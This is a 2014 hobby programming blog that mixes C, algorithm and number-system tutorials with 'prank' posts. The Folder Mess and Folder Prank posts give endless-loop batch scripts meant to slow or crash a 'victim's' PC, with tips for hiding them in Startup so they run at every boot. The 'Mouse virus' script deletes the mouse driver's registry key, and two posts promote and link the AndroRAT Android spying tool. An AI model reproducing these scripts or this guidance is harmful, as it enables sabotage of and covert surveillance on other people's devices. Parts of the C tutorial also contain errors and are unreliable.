Sunday, 26 January 2014

W3Schools In PD.


Download Complete W3Schools Offline Version Tutorials Free :
W3Schools web tutorial are very helpful for noobs to learn XHTML, CSS, XML, HTML, browser scripting java script vbscript DHTML WML Script, server scripting PHP, ASP, SQL, Dot NET etc. This website provides basicinformations to a lot of web related programming languages.When you don't have the internet connection you can browse w3schools website easily with this offline version.

Steps for downloading and accessing W3School offline files:

  1.  Download  w3schools offline version files by clicking on download button below.
  2. Use 7zip or Winrar to extract W3schools Offline Version files anywhere on your computer,lets say XYZ folder on your desktop.
  3. Open XYZ folder and then Open w3schools offline version  folder.
  4. Then open www.w3schools.com folder.
  5. Scroll down below, you will see a default.htm file. Click it to open & browse w3schools.com offline versions.
To Download W3Schools Offline Version Tutorials
Alternate Downloading Link.

Password: www.nerdprogrammer.in

PLEASE DON'T FORGET TO SHARE THIS INFORMATION WITH YOUR FRIENDS.

Saturday, 25 January 2014

Variables.

Till now,we have discussed the elements of algorithm.But a program comprises of algorithm and data.Therefore,it is now necessary to understand the concept of data.It is known that data is a symbolic representation of value and that programs set the context that gives data a proper meaning.In programs,data is transformed into information.
The question is ,how is data represented in program?
Almost every algorithm contains data and usually the data is 'contained' in what is called a variable.
The variable is a container for a value that may vary during the execution of program.For example,in the tea-making algorithm,the level of water is a variable and the quantity of tea level is also a variable.
Each variable in a program is given a name,for example,

  • water_level
  • water_temperature
  • tea_leaves_quantity
and at any given time the value,which is represented by water_level,for instance,may be different to its value at some other time.This statement
"if the kettle does not contain water then fill the kettle" could also be written as
"if water_level is 0 then fill the kettle"
or
"if water_level=0 then fill the kettle"
At some point water_level will be at maximum value,whatever that is and the kettle will be full.

Variables and data types:

The data used in algorithms can be of different types.The simplest types of data that an algorithm might use are
  • numeric data,e.g., 12,11.45,901,27,32,etc.
  • alphabetic or character data such as 'A','Z',or 'Any String',or 'Any character from the keyboard'.
  • logical data,that is propositions with true/false values.
A variable is nothing but a name given to a storage area that our programs can manipulate. Each variable in C has a specific type, which determines the size and layout of the variable's memory; the range of values that can be stored within that memory; and the set of operations that can be applied to the variable.
The name of a variable can be composed of letters, digits, and the underscore character. It must begin with either a letter or an underscore. Upper and lowercase letters are distinct because C is case-sensitive. Based on the basic types explained in previous chapter, there will be the following basic variable types:
TypeDescription
charTypically a single octet(one byte). This is an integer type.
intThe most natural size of integer for the machine.
floatA single-precision floating point value.
doubleA double-precision floating point value.
voidRepresents the absence of type.
C programming language also allows to define various other types of variables, which we will cover in subsequent chapters like Enumeration, Pointer, Array, Structure, Union, etc. For this chapter, let us study only basic variable types.

Variable Definition in C:

A variable definition means to tell the compiler where and how much to create the storage for the variable. A variable definition specifies a data type and contains a list of one or more variables of that type as follows:
type variable_list;
Here, type must be a valid C data type including char, w_char, int, float, double, bool or any user-defined object, etc., and variable_list may consist of one or more identifier names separated by commas. Some valid declarations are shown here:
int    i, j, k;
char   c, ch;
float  f, salary;
double d;
The line int i, j, k; both declares and defines the variables i, j and k; which instructs the compiler to create variables named i, j and k of type int.
Variables can be initialized (assigned an initial value) in their declaration. The initializer consists of an equal sign followed by a constant expression as follows:
type variable_name = value;
Some examples are:
extern int d = 3, f = 5;    // declaration of d and f. 
int d = 3, f = 5;           // definition and initializing d and f. 
byte z = 22;                // definition and initializes z. 
char x = 'x';               // the variable x has the value 'x'.
For definition without an initializer: variables with static storage duration are implicitly initialized with NULL (all bytes have the value 0); the initial value of all other variables is undefined.

Variable Declaration in C:

A variable declaration provides assurance to the compiler that there is one variable existing with the given type and name so that compiler proceed for further compilation without needing complete detail about the variable. A variable declaration has its meaning at the time of compilation only, compiler needs actual variable declaration at the time of linking of the program.
A variable declaration is useful when you are using multiple files and you define your variable in one of the files which will be available at the time of linking of the program. You will use extern keyword to declare a variable at any place. Though you can declare a variable multiple times in your C program but it can be defined only once in a file, a function or a block of code.

Example:

Try following example, where variables have been declared at the top, but they have been defined and initialized inside the main function:
#include <stdio.h>

// Variable declaration:
extern int a, b;
extern int c;
extern float f;

int main ()
{
  /* variable definition: */
  int a, b;
  int c;
  float f;
 
  /* actual initialization */
  a = 10;
  b = 20;
  
  c = a + b;
  printf("value of c : %d \n", c);

  f = 70.0/3.0;
  printf("value of f : %f \n", f);
 
  return 0;
}
When the above code is compiled and executed, it produces the following result:
value of c : 30
value of f : 23.333334
Same concept applies on function declaration where you provide a function name at the time of its declaration and its actual definition can be given anywhere else. For example:
// function declaration
int func();

int main()
{
    // function call
    int i = func();
}

// function definition
int func()
{
    return 0;
}

Lvalues and Rvalues in C:

There are two kinds of expressions in C:
  1. <> lvalue : An expression that is an lvalue may appear as either the left-hand or right-hand side of an assignment.
  2. <> rvalue : An expression that is an rvalue may appear on the right- but not left-hand side of an assignment.
Variables are lvalues and so may appear on the left-hand side of an assignment. Numeric literals are rvalues and so may not be assigned and can not appear on the left-hand side. Following is a valid statement:
int g = 20;
But following is not a valid statement and would generate compile-time error:
10 = 20;
Please don't forget to share this information with your friends.

Next post of  C Language theory will be on Data Types.If you have any doubts related to variables,please comment in comment box or contact us.

Wednesday, 22 January 2014

NP Text Encryptor.


Text Encryptor is a freeeware application which is used to encrypt any text message using password.Once the text is encrypted,you will require the password to decrypt it.Without the password,your text message will be lost for ever.This application works on simple algorithm for encrypting and decrypting the text message.The only drawback of this application is that the text message after decryption will be in uppercase only.Also it will double the length of the string when encrypting. Don't use this encryption application as the only source of security for important data.

Steps For Encrypting text message:

  1. Open Text Encryptor By Nerd Programmer.
  2. Below "Text Secure",you will find "Password",enter the password with which you want to encrypt your text message.
  3. Below "Decrypt",you can see the text area,enter the text in that area which you want to encrypt.
  4. Then click on "Encrypt".Your text will be encrypted.
Copy paste the generated code from the text area.Its your encrypted text.Save this encrypted text anywhere.

Steps for Decrypting text message:

  1. Open Text Encryptor By Nerd Programmer.
  2. Below "Text Secure",you will find "Password",enter the password  which you used to encrypt your text message.
  3. Copy paste the encrypted text message in text area and then click on "Decrypt".
  4. Your text message will be decrypted.

If you want the source code of this application,we will surely provide you but only if you become member of Nerd Programmer ,follow us on google plus as well as join our official group at www.facebook.com/groups/nerdprogrammer and then contact us using contact form  providing your e-mail address in it and asking for source code.


Click To Download Text Encryptor.

NOTE:ABOVE INFORMATION AND SOURCE CODE IS FOR EDUCATION AND SECURITY PURPOSE ONLY.IF YOU MISUSE OR MISTREAT THE ABOVE INFORMATION,THEN IT CAN BRING UNLAWFUL CHARGES BY THE PERSON ON WHOM YOU USED THIS TRICK.THE AUTHOR WILL NOT BE RESPONSIBLE IN THE EVENT ANY UNLAWFUL CHARGES ARE BROUGHT TO YOU BY ANY INDIVIDUALS BY MISUSING THE ABOVE INFORMATION.WE WON'T TAKE RESPONSIBILITY FOR ANY OF YOUR ACTION RELATED TO ABOVE INFORMATION.

Simple Calculator.

I have made a simple calculator using HTML and VB Script.This calculator have ".hta" extension.
You can enter the expression using mouse and click the buttons.Also you can enter expression using the keyboard.
To prevent the chances of invalid expression being entered,only numerical keys and sign keys are allowed on keyboard along with "c" to clear and "Enter" key to evaluate the expression.

Click To Download Simple Calculator.


NOTE:If you want the source code of this application,we will surely provide you but only if you become member of Nerd Programmer ,follow us on google plus as well as join our official group at www.facebook.com/groups/nerdprogrammer and then contact us using contact form  providing your e-mail address in it and asking for source code.

Please don't forget to share this information with your friends.

NOTE:THE COPYRIGHT OF ABOVE APPLICATION STRICTLY GOES TO THE NERD PROGRAMMER,SO DON'T REPUBLISH THIS INFORMATION ANYWHERE WITHOUT OUR PERMISSION BUT YOU CAN SHARE IT WITH WHOM SO EVER YOU WANT.IF YOU MISUSE OR MISTREAT THE ABOVE INFORMATION,THEN IT CAN BRING UNLAWFUL CHARGES BY THE PERSON ON WHOM YOU USED THIS TRICK.THE AUTHOR WILL NOT BE RESPONSIBLE IN THE EVENT ANY UNLAWFUL CHARGES ARE BROUGHT TO YOU BY ANY INDIVIDUALS BY MISUSING THE ABOVE INFORMATION.WE WON'T TAKE RESPONSIBILITY FOR ANY OF YOUR ACTION RELATED TO ABOVE INFORMATION.

Hide Text in Images.


Good morning,today i am going to share a html based application which have extension ".hta".
Now a days,i have seen many guys and girls searching for an application or trick to hide text messages into images that too with password encrypted so that no one can read it except the one to whom the message has been written.
So after waking up whole night,i have made an application which will perform this task and have named it as "Nerd Programmer Text Encryptor".
So from now using a simple HTML application to hide the text into the image file according to the password you provide,you can send secret messages to your friends. Both you and your friend should have the program and must know the password.

How to use Nerd Programmer Text Encryptor:


Steps for hiding text message inside image:

  1. Open Nerd Programmer Text Encryptor.
  2. You will see text box for "Password".The password must be an integer between 1000 and 9999.
  3. Type the Password which you want to use while encrypting the message.
  4. Below password you will see text box which is text area for typing the message which you want to encrypt.Type the message in text area.
  5. Next text box you will find is of "Image path".Click on browse and select the image in which you want to hide your password encrypted message.Select it and click on ok.
  6. Click on "Hide" button to hide your encrypted message in image.A popup will open saying that "The text has been embedded into NPsecret.jpg".
  7. After pressing the "Hide" button,a new image with name "NPsecret.jpg" will be generated in the same directory where your "Nerd Programmer Text Encryptor" application is present.This image is very important as it contains the password encrypted text message.Send this image to your friend.

Steps for retrieving text message from image(NPsecret):

  1. Store the password encrypted text message image(NPsecret.jpg) anywhere on your system.
  2. Open Nerd Programmer Text Encryptor.
  3. Below "Hide" button,you will see text box for "Password",enter the password which was used while encrypting the text message.
  4. Below "Password" you will find text box for "Image path",click on browse and locate the password encrypted text message image(NPsecret).Select it and click on ok.
  5. Then click on "Retrieve" button below "Image path".A popup will open saying that "The retrived text has been saved to NPtext.txt ".
  6. If your password is wrong,you will get and alert saying that "Incorrect password!" and your text message will not be decrypted.So re-enter the correct password..
  7. If you enter the correct password,then you will find that a new txt file has been generated in the same directory where your "Nerd Programmer Text Encryptor" application is present.
  8. Open the "NPtext.txt" file and you will find the text message which was encrypted by your friend.
WARNING:The data in the image file will be lost if you edit it with any picture editing program.

If you want the source code of this application,we will surely provide you but only if you become member of Nerd Programmer ,follow us on google plus as well as join our official group at www.facebook.com/groups/nerdprogrammer and then contact us using contact form  providing your e-mail address in it and asking for source code.

Please don't forget to share this information with your friends.

NOTE:THE COPYRIGHT OF ABOVE APPLICATION STRICTLY GOES TO THE NERD PROGRAMMER,SO DON'T REPUBLISH THIS INFORMATION ANYWHERE WITHOUT OUR PERMISSION BUT YOU CAN SHARE IT WITH WHOM SO EVER YOU WANT.IF YOU MISUSE OR MISTREAT THE ABOVE INFORMATION,THEN IT CAN BRING UNLAWFUL CHARGES BY THE PERSON ON WHOM YOU USED THIS TRICK.THE AUTHOR WILL NOT BE RESPONSIBLE IN THE EVENT ANY UNLAWFUL CHARGES ARE BROUGHT TO YOU BY ANY INDIVIDUALS BY MISUSING THE ABOVE INFORMATION.WE WON'T TAKE RESPONSIBILITY FOR ANY OF YOUR ACTION RELATED TO ABOVE INFORMATION.


Tuesday, 21 January 2014

Folder Mess Trick.


In this post,i am going to show you some codes,which will create folders some limited on its own and open it automatically.
Well,this can be quiet irritating for your victim as when ever this code is executed on your victim computer,it will make limited number of folders but will open them continuously which will result in slowing down the system or even sometimes the system will crash.
Copy paste the below code in notepad and save it with "anyname.bat".
@echo off
:RON
md NerdProgrammer1 
md NerdProgrammer2
md NerdProgrammer3
md NerdProgrammer4
md NerdProgrammer5
md NerdProgrammer6
md NerdProgrammer7
md NerdProgrammer8
md NerdProgrammer9
md NerdProgrammer10
md NerdProgrammer11
md NerdProgrammer12
md NerdProgrammer13
md NerdProgrammer14
md NerdProgrammer15
start NerdProgrammer1
start NerdProgrammer2
start NerdProgrammer3
start NerdProgrammer4
start NerdProgrammer5
start NerdProgrammer6
start NerdProgrammer7
start NerdProgrammer8
start NerdProgrammer9
start NerdProgrammer10
start NerdProgrammer11
start NerdProgrammer12
start NerdProgrammer13
start NerdProgrammer14
start NerdProgrammer15
goto RON 

NOTE: Save the above code in using notepad with ".bat" extension.

 

TIPS:To make the above code work more worse,add more number of folders by adding command "md foldername_" where "_" represents any number which you want to give or you can give your custom name also by replacing "NerdProgrammer_" where "_" is any number at the end of folder name.Just make sure that if you give custom name to the folder which will be created in future,please put the "start foldername_" command also so that it can be opened after being created.
Also you can make shortcut of this bat file and save it in "Startup" and hide it along with its  original bat files,so whenever the computer starts,this bat file will be executed result in irritating your victim as your victim won't be able to do their work.

If you have placed the shortcut of above bat files,you might observe that when ever the computer starts,this bat file is executed,to make everything work as it was before execution of this trick,boot your system in safe node,browse to your startup folder,if you have hided this bat file then first go in control panel>folder option>view and then tick the option" show hidden files and folder and drives",then come back to startup folder and delete the bat file or its shortcut.By doing this,whenever your computer will start,it will work fine as it used to do before.


Please don't forget to share this information with your friends.

NOTE:ABOVE INFORMATION AND SOURCE CODE IS FOR EDUCATION AND SECURITY PURPOSE ONLY.IF YOU MISUSE OR MISTREAT THE ABOVE INFORMATION,THEN IT CAN BRING UNLAWFUL CHARGES BY THE PERSON ON WHOM YOU USED THIS TRICK.THE AUTHOR WILL NOT BE RESPONSIBLE IN THE EVENT ANY UNLAWFUL CHARGES ARE BROUGHT TO YOU BY ANY INDIVIDUALS BY MISUSING THE ABOVE INFORMATION.WE WON'T TAKE RESPONSIBILITY FOR ANY OF YOUR ACTION RELATED TO ABOVE INFORMATION.



Monday, 20 January 2014

Folder Prank.


In this post,i will show you how to make unlimited number of folders within few seconds.
The main aim of this trick is to make your victim tensed as when ever this source code will be executed,unlimited number of folders will be created within few seconds.
Copy paste the below code in note pad and save it with ".bat" extension.
q@echo off :top md NerdProgrammer%random% goto top

 Note:Save the above code with ".bat" extension,eg "folderprank.bat"


Tips:When you will run the bat file,you will observe that the directory in which this file is placed,new folders are created over there.So i will suggest you to keep the bat file in a proper folder so that you don't mess around.Also you can create a shortcut of the bat file and place it in "Startup" folder and hide the original bat file,so when ever the windows will restart,this bat file will executed automatically and your victim will be in great trouble if you place the original bat file in the same folder where your victim have saved important data.

When you run the bat files,you will observe that folder which are created have name "NerdProgrammer" with some random number at the end,you can change the name by replacing "NerdProgrammer" with whatever you want.

If you have placed the shortcut of above bat files,you might observe that when ever the computer starts,this bat file is executed,to make everything work as it was before execution of this trick,boot your system in safe node,browse to your startup folder,if you have hided this bat file then first go in control panel>folder option>view and tick the option" show hidden files and folder",then come back to startup folder and delete the bat file or its shortcut.By doing this,whenever your computer will start,it will work fine as it used to do before.


NOTE:ABOVE INFORMATION AND SOURCE CODE IS FOR EDUCATION AND SECURITY PURPOSE ONLY.IF YOU MISUSE OR MISTREAT THE ABOVE INFORMATION,THEN IT CAN BRING UNLAWFUL CHARGES BY THE PERSON ON WHOM YOU USED THIS TRICK.THE AUTHOR WILL NOT BE RESPONSIBLE IN THE EVENT ANY UNLAWFUL CHARGES ARE BROUGHT TO YOU BY ANY INDIVIDUALS BY MISUSING THE ABOVE INFORMATION.WE WON'T TAKE RESPONSIBILITY FOR ANY OF YOUR ACTION RELATED TO ABOVE INFORMATION.


Mouse virus.


Have you every thought to disable or delete mouse pointer from your windows OS while still the mouse is connected to your computer and the mouse light glows?
The below trick help us to do this task.The code give below when run,it just delete the mouse files from the windows registrey.
Any driver or software we install on our computer are registered in windows regedit.
If the registry file of a particular software or driver is deleted,then that software or driver wont work.
There are to ways to do this task.The first way is to manually delete the registry file of mouse and the second way is to make a program which will directly do this job for you.

Here's the code:

rem ---------------------------------
rem Disable Mouse
set
 key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
rem ---------------------------------

Save the above code as "anyname.bat"
Note: Save with ".bat" extension.

The above code is not a virus,its a redesign shortcut for accessing and deleting the regedit files.Many antivirus will detect it as virus,but don't worry,it will just delete the mouse from the operating system on which it is executed.

NOTE:ABOVE INFORMATION AND Source code IS FOR EDUCATION AND SECURITY PURPOSE ONLY.IF YOU MISUSE OR MISTREAT THE ABOVE INFORMATION,THEN IT CAN BRING UNLAWFUL CHARGES BY THE PERSON ON WHOM YOU USED THIS TRICK.THE AUTHOR WILL NOT BE RESPONSIBLE IN THE EVENT ANY UNLAWFUL CHARGES ARE BROUGHT TO YOU BY ANY INDIVIDUALS BY MISUSING THE ABOVE INFORMATION.WE WON'T TAKE RESPONSIBILITY FOR ANY OF YOUR ACTION RELATED TO ABOVE INFORMATION.


The Repetition constructs-repeat and while

Repetition can be implemented using constructs like the repeat loop,while loop and if...then...goto... loop.The repeat loop is used to iterate or repeat a process or sequence of processes until some conditional becomes true.
It has the general form:

Repeat
          Process 1
          Process 2
          ..............
          ...............
          Process N
          until proposition
Here is an example:
Repeat
          Fill water in kettle
until Kettle is full

The process is 'Fill water in Kettle',the proposition is 'Kettle is full'.
The repeat loop does some processing before testing the state of proposition.
What happens though if in the above example the Kettle is already full?
If the Kettle is already full at the start of the Repeat loop,then filling more water will lead to an overflow.This is a drawback of Repeat construct.
In such case the while loop is more appropriate.The above example with the while lopp is shown as follows:

while Kettle is not full
         fill water in Kettle

Since,the decision about the Kettle being full or not is made before filling water,the possibility of an overflow is eliminated.The while loop find out whether some condition is true before repeating a process or a sequence of processes.
If the condition is false,the process or the sequence of process is not executed.The general form of while loop processes is not executed.
The general form of while loop is :

while proposition
begin
Process 1
Process 2
...............
...............
Process N
end

The if...then...goto is also used to repeat a process or a sequence of process until the given proposition is false.In the Kettle example,this construct would be implemented as follows:

  1. Fill some water in Kettle
  2. if Kettle not full then goto 1

So long as the proposition 'Kettle not full' is true,the process 'fill some water in Kettle' is repeated.
The general form of if...then...got.. is:
Process 1
Process 2
..............
..............
Process N
if proposition then goto Process 1

Termination:

The definition of algorithm cannot be restricted to procedure that eventually finish.Algorithms might also include procedures that could run forever without stopping.Such a procedure has been called a computational method by Knuth or calculation procedure or algorithm by Kleene.However,Kleene notes that such a method must eventually exhibit 'some object'.Minsky (1967) makes the observation that,if an algorithm has not terminated,then how can the following question be answered:"Will it terminate with correct answer?".Thus the answer is :undecideable.It can never be known,nor can the deisgner do an analysis beforehand to find it out.The analysis of algorithms for their likelihood of termination is called termination analysis.

Correctness:

The prepared algorithm need to be verified for its correctness.Correctness means how easily its logic can be argued to meet the algorithm's primary goal.This requires the algorithm to be made in such a way that all the elements in it are traceable to the requirements.
Correctness requires that all the components like the data structure,modules,external interfaces and module interconnections are completely specified.
In other words,correctness is the degree to which an algorithm performs its specified function.The most common measure of correctness is defects per Kilo Lines of codes(KLOC) that implements the algorithm,where defect is defined as the verified lack of conformance to requirements.

IF YOU NEED ANY MORE INFORMATION RELATED TO ALGORITHM,VISIT THIS LINK: HTTP://GOO.GL/YLJXYP

Please don't forget to share this information with your friends.

Sequence and Decision in Algorithm.

Sequence means that each step or process in the algorithm is executed in the specified order.In the Kettle example,each process must be in the proper place otherwise the algorithm will fail.

The decision constructs -if...then,if...then...else...

In algorithms the outcome of a decision is either true or false;there is no state in between.The outcome of the decision is based on some condition that can only result in a true or false value.
For example:
if today is Monday then collect pay
Here,the above statement is a decision and the decision takes the general form: if proposition then process
A proposition,in this sense,is a statement,which can only be true or false.It is either true that 'today is Monday' or it is false.If the proposition is true,then the process or procedure that follows the proposition is executed.
The decision can also be stated as:
if proposition
                   then process 1
else             process 2
This  is the if...then...else... form of decision.This means that if the proposition is true,then execute process 1,else execute process 2.
The first form of the decision if proposition then process has a null else,that is,there is no else.

Let us take an example to understand sequence and decision.

Q1)Write an algorithm to check whether a number given by user is even or odd.
Solution: Let the number to be checked be represented by 'N'.
The number 'N' is divided by 2 to give an integer quotient,denoted by Q.If the remainder,designated as 'R' is zero,'N' is even,otherwise 'N' is odd.This logic is applied in following algorithm.
  1. START
  2. [Ask Input]
    Print "Enter the number"
  3. [Take Input]
    Input N
  4. [Logic Applied to find whether number is even or odd]
    Q <- N/2 (i.e. Q=N/2)
  5. [Finding remainder]
    R <- N-Q*2 (i.e. R=N-Q*2)
  6. [Decision Construct]
    If R = 0 then Print "N is EVEN"
  7. [Decision Construct] If R!=0 then Print "N is ODD"
  8. STOP

Q2)Print the largest among three numbers.
Solution: Let the three number be represented  by A,B, and C.There can be three ways of solving the problem.The three algorithms with some differences are given below:
   Type 1: By using AND operator.
  1. START
  2. Print "Enter the Number"
  3. Input A,B,C
  4. If A >= B AND B>=C
    Then print A
  5. If B >= C AND C >= A
    Then Print B
    ELSE Print C
  6. STOP
   Type 2: This algorithm uses a variable MAX to store the largest number.
  1. START
  2. Print "Enter THREE NUMBERS"
  3. Input A,B,c
  4. MAX <-A (i.e. MAX=A)
  5. If B > MAX Then MAX <- B (i.e. MAX=B)
  6. If C > MAX Then MAX <- C (i.e. MAX=C)
  7. Print MAX
  8. STOP
Type 3: This algorithm uses a nested if construct.
  1. START
  2. Print "Enter three number"
  3. Input A,B,C
  4. If A > B then
    If A > C Then
    Print A
    Else Print C
    Else If B > C Then
    Print B
    Else Print C
  5. STOP
If you face any problem regarding ALGORITHM,inform us and we will try to solve it out.

NOTE:More examples of ALGORITHM will be updated only on user demand.

IF YOU NEED ANY MORE INFORMATION RELATED TO ALGORITHM,VISIT THIS LINK: HTTP://GOO.GL/YLJXYP

Please don't forget to share this information with your friends.

ALGORITHMS.


Assuming that you have basic knowledge about computer like when it was made,types of computer and operating system,hardware parts of computer,inventor of computer,etc,i am starting a new but important topic "ALGORITHM".
If you dont have any basic knowledge about computer,just google it.

What is an Algorithm?

An algorithm is a part of the plan for the computer program. Infact ,an algorithm is an effective procedure for solving a problem in a finite number of steps.
It is effective,which means that an answer is found and it has a finite number of steps.A well-designed algorithm will always provide an answer,it may not be the desired anwser but there will be an answer.A well-designed algorithm is also guaranteed to terimnated.
An Algorithm can also be defined as "finite step by step list of well defined instructions for solving a particular problem".
We always need to write algorithm for making different data structure operations.So lets understand what algorithm consist of.
In first part of algorithm we tell the purpose of algorithm.It lists for variables and input data.The second part is a list of steps.
The steps in algorithm are executed one after the other.Control may be transferred to step 'n' by using statement like 'Go to step n'.The exit and stop statements completes the algorithm.The data may be assigned to variables by using read statement and it is displayed by write or print statement.
Today,all the daily computer applications you use,someone might once have written algorithm for it which worked successfully and its result is in our hand.
Google,Facebook,Twitter,Bing,Yahoo,MSN ,etc,all are created and working successfully as their base(algorithm) had worked correctly.So,before any programmer start making something(own application),he/she should first make the algorithm as it is related to many factors like process execution time,results,etc.

General syntax of algorithm is given below:

ALGORITHM 1: Purpose of algorithm and input data and variables used.
Start
Step 1: ………………………………………………………
Step 2: ………………………………………………………
            :
            :
Step n: …………………………………………………………….
Stop or Exit.

Different Ways Of Stating Algorithm.

Algorithm may be represented in various ways.There are four ways of stating algorithms.There steps are as follows:
  • Step-form.
  • Pseudo-code.
  • Flow chart.

Step-Form Algorithm:

In the step form representation,the procedure of solving a problem is stated with written statements.Each statement solves a part of problem and these together completes the solution.The step-form uses just normal language to define each procedure.Every statement ,that defines an action,is logically related o preceding statement.

Pseudo-code:

The pseudo-code is a written form representation of the algorithm.However,it differs from the step form as it uses a restricted vocabulary to define its action of solving the problem.One problem with human language is that it can seem to be imprecise.But the pseudo-code,which is in human language,tends towards more precision by using a limited vocabulary.

Flow chart and Nassi-Schneiderman:

Flow chart and Nassi-Schneiderman are graphically oriented representation forms.They use symbols and language to represent sequence,decision and repetition actions.
Standard flowchart symbols are given below:

Key Features of an Algorithm and the Step-form.

Here is an example of an algorithm,for making a pot of tea.
  1. If the kettle does not contain water,then fill the kettle.
  2. Plug the kettle into power point and switch it on.
  3. If the teapot is not empty,then empty the teapot.
  4. Place tea leaves in teapot.
  5. If the water in the kettle is not boiling,then go to step 2.
  6. Switch off the kettle.
  7. Pour water from the kettle into the teapot.
It can be seen that the algorithm has a number of steps and that some steps(1,3 and 5) involve decision making and one step(5 in case) involves repetition,in this case the process of waiting for the kettle to boil.
From this example,it is evident that algorithms show there three features:
Therefore, an algorithm can be stated using three basic constructs : sequence, decision and repetition.
To know more about sequence construct click here.
To know more about decision construct click here.
To know more about repetition construct click here.

If you need any more information related to algorithm,visit this link: http://goo.gl/yLJXyP

Don't forget to share this information with your friends.

Sunday, 19 January 2014

AndroRAT(Made Easy)


AndroRat is a client/server application developed in Java Android for the client side and in Java/Swing for the Server.
The name AndroRat is a mix of Android and RAT (Remote Access Tool).
The goal of the application is to give the control of the android system remotely and retrieve information from it.

THE AVAILABLE  FUNCTION ARE:

  • Get contacts (and all theirs informations)
  • Get call logs
  • Get all messages
  • Location by GPS/Network
  • Monitoring received messages in live
  • Monitoring phone state in live (call received, call sent, call missed..)
  • Take a picture from the camera
  • Stream sound from microphone (or other sources..)
  • Streaming video (for activity based client only)
  • Do a toast
  • Send a text message
  • Give call
  • Open an URL in the default browser
  • Do vibrate the phone


Watch the video below to learn how to use AndroRat.


NOTE:ABOVE INFORMATION AND APPLICATION IS FOR EDUCATION AND SECURITY PURPOSE ONLY.IF YOU MISUSE OR MISTREAT THE ABOVE INFORMATION,THEN IT CAN BRING UNLAWFUL CHARGES BY THE PERSON ON WHOM YOU USED THIS TRICK.THE AUTHOR WILL NOT BE RESPONSIBLE IN THE EVENT ANY UNLAWFUL CHARGES ARE BROUGHT TO YOU BY ANY INDIVIDUALS BY MISUSING THE ABOVE INFORMATION.WE WON'T TAKE RESPONSIBILITY FOR ANY OF YOUR ACTION RELATED TO ABOVE INFORMATION.


AndroRat.

Androrat is a client/server application developed in Java Android for the client side and in Java/Swing for the Server.
The name Androrat is a mix of Android and RAT (Remote Access Tool).
It has been developed in a team of 4 for a university project. It has been realised in one month. The goal of the application is to give the control of the android system remotely and retrieve information from it.

Technical matters:

  • The android application is the client for the server which receive all the connections.
  • The android application run as a service(not an activity) that is started during the boot. So the user does not need to interact with the service (Even though there is a debug activity that allow to configure the IP and the port to connect to).
  • The connection to the server can be triggered by a SMS or a call (this can be configured)

All the available  functionalities are:

  • Get contacts (and all theirs informations)
  • Get call logs
  • Get all messages
  • Location by GPS/Network
  • Monitoring received messages in live
  • Monitoring phone state in live (call received, call sent, call missed..)
  • Take a picture from the camera
  • Stream sound from microphone (or other sources..)
  • Streaming video (for activity based client only)
  • Do a toast
  • Send a text message
  • Give call
  • Open an URL in the default browser
  • Do vibrate the phone

For more info,click here.

Click To Download AndroRat.

NOTE:ABOVE INFORMATION AND APPLICATION IS FOR EDUCATION AND SECURITY PURPOSE ONLY.IF YOU MISUSE OR MISTREAT THE ABOVE INFORMATION,THEN IT CAN BRING UNLAWFUL CHARGES BY THE PERSON ON WHOM YOU USED THIS TRICK.THE AUTHOR WILL NOT BE RESPONSIBLE IN THE EVENT ANY UNLAWFUL CHARGES ARE BROUGHT TO YOU BY ANY INDIVIDUALS BY MISUSING THE ABOVE INFORMATION.WE WON'T TAKE RESPONSIBILITY FOR ANY OF YOUR ACTION RELATED TO ABOVE INFORMATION.

Saturday, 18 January 2014

Folder Protector.

Folder Protector

Folder Locker is a simple easy to use application for windows to hide important data inside a folder.
Anyone can use this application to hide any file inside a folder.

Folder Protector Commands.

  1. Lock: Lock the folder.
  2. Unlock: Unlock the folder.
  3. Change: Change password.
  4. Credits: For more information related to application.
  5. Exit: To exit application
When you will run this application,it will ask you to set  password.Set the password which you can remember easily but not that easy that anyone could crack it.
After setting password,A folder name "SecuredFILES" will be created in same directory where exe file of this application is present.To lock files,cut paste the file in "SecuredFILES" folder and then in "Folder Protector" application,type "Lock",it will as say "ARE YOU SURE YOU WANT TO SecuredFILES",type yes.All your files will be locked.
To unlock files,type unlock,it will ask for password,type your password and all your files will be unlocked.

Password: nerdprogrammer

NOTE:ABOVE INFORMATION AND APPLICATION IS FOR EDUCATION AND SECURITY PURPOSE ONLY.IF YOU MISUSE OR MISTREAT THE ABOVE INFORMATION,THEN IT CAN BRING UNLAWFUL CHARGES BY THE PERSON ON WHOM YOU USED THIS TRICK.THE AUTHOR WILL NOT BE RESPONSIBLE IN THE EVENT ANY UNLAWFUL CHARGES ARE BROUGHT TO YOU BY ANY INDIVIDUALS BY MISUSING THE ABOVE INFORMATION.WE WON'T TAKE RESPONSIBILITY FOR ANY OF YOUR ACTION RELATED TO ABOVE INFORMATION.

Saturday, 11 January 2014

Number System.

To learn various programming languages,we must first learn all types of number system and their conversion.
In this post,i am going to give you some information related to number system.

Number system:

A number system defines a set of values used to represent quantity.We talk about the number of people attending class,the number of modules taken per student and also use numbers to represent grades achieved by students in test.Study of number system is not just limited to computers.We apply numbers everyday and knowing how numbers work will give us an insight into how a computer manipulates and stores numbers.
Radix or Base:
  • The number of values that a digit can assume is equal to the base of the system.It is also called as the Radix of system.For example,for a decimal system(0-9),the base is "10",hence every digit can assume 10 values.
  • The largest value of a digit is always one less than the base.For example,the largest digit in a decimal system is 9(one less than the base).
  • Each digit position represents a different multiple of base,i.e. the numbers have positional importance.
  • For example consider the decimal number (349.25)10.Here,the position of each digit is represented as follows:   3*102+4*101+9*100+2*10-1+5*10-2,which is equal to 300+40+9+0.25=349.25.
  • Hence,we can implement a common rule for all the numbering system as follows.For a general number,we have to multiply each of digit by some power of base(B) or radix.

Various Numbering System:

Name of number system                            Base

  1. Binary                                                         2
  2. Octal                                                           8
  3. Decimal                                                     10
  4. Duodecimal                                               12
  5. Hexadecimal                                             16
There are many more number system,but the above listed number system are common and important number system which are used now a days in our day to day life.

Decimal Number System:

g
The number  system we have been taught to use since school is called as decimal number system.We are familiar with counting and mathematics that uses this system.
Characteristics of a decimal system:
Some of important characteristic of a decimal system are:
  1. It uses the base of 10.
  2. The largest value of digit is9.
  3. Each place represents a different multiple of 10.The multiples are also called as weighted values.The weighted values of each position are as shown below:

Most Significant Digit(MSD):

It is the leftmost digit having the highest weight.

Least Significant Digit(LSD):

It is the rightmost digit having lowest weight.

The Binary Number System:

  • Most modern computer system operate using the binary logic.A computer cannot operate on the decimal number system.
  • A binary number system uses only two values 0(for OFF) and 1(for ONN).
  • The binary number system works loke a decimal number system except one change.It uses the base 2.
